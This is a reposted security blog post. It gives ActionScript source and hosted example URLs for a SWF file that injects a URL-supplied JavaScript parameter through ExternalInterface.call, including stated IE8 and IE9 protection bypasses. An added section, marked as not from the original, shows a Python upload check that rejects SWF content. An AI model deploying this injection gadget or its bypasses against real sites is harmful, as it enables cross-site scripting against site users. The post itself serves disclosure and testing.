XSS by uploading/including a SWF file

Source: 自学PHP网    Time: 2015-04-17 10:15

On November 12, 2012, in Security Articles, Security Posts, by Soroush Dalili
As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to present this SWF file that you can use in your PoCs.
 
This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either.
 
Note: IE has a protection to make the “document” object inaccessible when you open a SWF directly in a browser. I have bypassed IE8 protection by using a simple redirection in JavaScript. I have also found a noisy way to bypass IE9 protection by opening a new window (you may be able to do it in a less noisy way – please leave your comments if you know any other bypass method).
 
Here is the ActionScript code:
 

package
{
    import flash.display.Sprite;
    import flash.external.*;
    import flash.system.System;
    public class XSSProject extends Sprite
    {
        public function XSSProject()
        {
            flash.system.Security.allowDomain("*");
            ExternalInterface.marshallExceptions = true;
            try {
                ExternalInterface.call("0);}catch(e){};"+root.loaderInfo.parameters.js+"///*PoC by Soroush Dalili @IRSDL - only for testing/educational purposes - He accepts no responsibility for any bad/malicious usage*/");
            } catch(e:Error) {
                trace(e);
            }
        }
    }
}

 
The compiled file is accessible via: http://0me.me/demo/xss/xssproject.swf
 
Examples:
 
Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
 
IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open('?js=history.go(-1)','_self');}
 
IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open('invalidfileinvalidfileinvalidfile','target');setTimeout('alert(w.document.location);w.close();',1);
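
On the defensive side, the precondition described above is that a SWF file can be uploaded to the site at all, so the added example below (not part of the original post) shows an upload gate that rejects content carrying a SWF signature instead of trusting the file name. The function names are hypothetical, the sample bytes are constructed and are not a playable movie, and the `ExternalInterface` string scan is a triage heuristic that assumes class names appear as plain strings in the decompressed body.

```python
import struct
import zlib

# SWF signatures: the first three bytes of the file.
SWF_MAGIC = {b"FWS": "none", b"CWS": "zlib", b"ZWS": "lzma"}

def sniff_swf(data: bytes):
    """Return SWF header details if data starts with a SWF signature, else None."""
    if len(data) < 8 or data[:3] not in SWF_MAGIC:
        return None
    info = {
        "compression": SWF_MAGIC[data[:3]],
        "version": data[3],
        "declared_len": struct.unpack("<I", data[4:8])[0],
        "external_interface": None,  # None = body could not be inspected
    }
    body = None
    if data[:3] == b"FWS":
        body = data[8:]
    elif data[:3] == b"CWS":
        try:
            body = zlib.decompress(data[8:])
        except zlib.error:
            pass  # a corrupt or truncated stream is still treated as SWF
    if body is not None:
        # Heuristic (assumption): class names sit as plain strings in the body.
        info["external_interface"] = b"ExternalInterface" in body
    return info

def check_upload(filename: str, data: bytes):
    """Hypothetical upload gate: decide on content, not on the file name."""
    info = sniff_swf(data)
    if info is None:
        return True, "no SWF signature"
    return False, "SWF content (%s, v%d) in %s" % (
        info["compression"], info["version"], filename)

def constructed_swf(body: bytes, compressed: bool) -> bytes:
    """Build a constructed header + body for the demo; not a playable movie."""
    magic, payload = (b"CWS", zlib.compress(body)) if compressed else (b"FWS", body)
    return magic + bytes([10]) + struct.pack("<I", 8 + len(body)) + payload

if __name__ == "__main__":
    sample = constructed_swf(b"\x00flash.external\x11ExternalInterface\x00", True)
    png = b"\x89PNG\r\n\x1a\n" + b"\0" * 8  # constructed non-SWF upload
    for name, blob in [("avatar.jpg", sample), ("real.png", png)]:
        print(name, check_upload(name, blob), sniff_swf(blob))
```

The LZMA-compressed variant (`ZWS`) is rejected on signature alone; its body is not decoded here.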
 
References:
 
[1] The other reason to beware ExternalInterface.call() (URL: http://lcamtuf.blogspot.co.uk/2011/03/other-reason-to-beware-of.html)
 
[2] Flash ExternalInterface.call() JavaScript Injection – can make the websites vulnerable to XSS (URL: http://soroush.secproject.com/blog/2011/03/flash-externalinterface-call-javascript-injection-%E2%80%93-can-make-the-websites-vulnerable-to-xss/)
 
From: http://soroush.secproject.com/blog/2012/11/xss-by-uploadingincluding-a-swf-file/
